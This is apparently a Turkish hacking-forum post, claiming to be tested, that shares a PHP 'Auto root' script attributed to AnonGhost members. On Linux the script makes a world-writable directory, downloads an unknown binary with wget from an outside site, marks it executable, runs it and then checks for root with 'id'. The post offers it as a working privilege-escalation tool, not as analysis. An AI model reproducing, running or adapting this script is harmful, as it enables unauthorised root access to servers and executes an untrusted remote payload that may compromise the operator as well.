Sunucuyu bypass edebilirseniz çalışıyor. Denendi 
Kod:
#!/usr/bin/php
<?php
/*
# PHP Auto root 2013 Version 2.0 Coded by Mauritania Attacker & Riad
# AnonGhost is Everywhere
# <3 AnonGhost <3
*/
set_time_limit(0);
system("clear");
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=------------|\n";
print "|PHP Auto Root Version 2.0 By Mauritania Attacker & Riad |\n";
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=------------|\n";
print "|Priv8 Version |\n";
print "|Rooting: All Linux Kernels |\n";
print "| <3 AnonGhost <3 |\n";
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=------------|\n";
sleep(4);
print "\nKernel to verify:\n";
print "lnx or bsd: ";
$kernel = fgets(STDIN);
$kernel = trim($kernel);
if($kernel == "lnx")
{
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=----------|\n";
print "|PHP Auto Root by Mauritania Attacker & Riad |\n";
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=----------|\n";
print "|Selected kernel : |Linux arq| |\n";
print "|--=--=--=--=--=--=--=--=--=--=--=--=--=----------|\n";
sleep(2);
print "\n***91;+***93; Testing lnx Exploit please wait....\n";
print "***91;~***93; Smoke Marijuana XD !!!! (:\n";
sleep(2);
system("mkdir lnx;chmod 0777 lnx;cd lnx/");
system("wget http://perlesbleues.com/language/fr-FR/a.out");
system("chmod +x a.out");
system("./a.out");
sleep(1);
system("id");
exit(0);
}
//EOF_
//2013
//Priv8 Version
?>
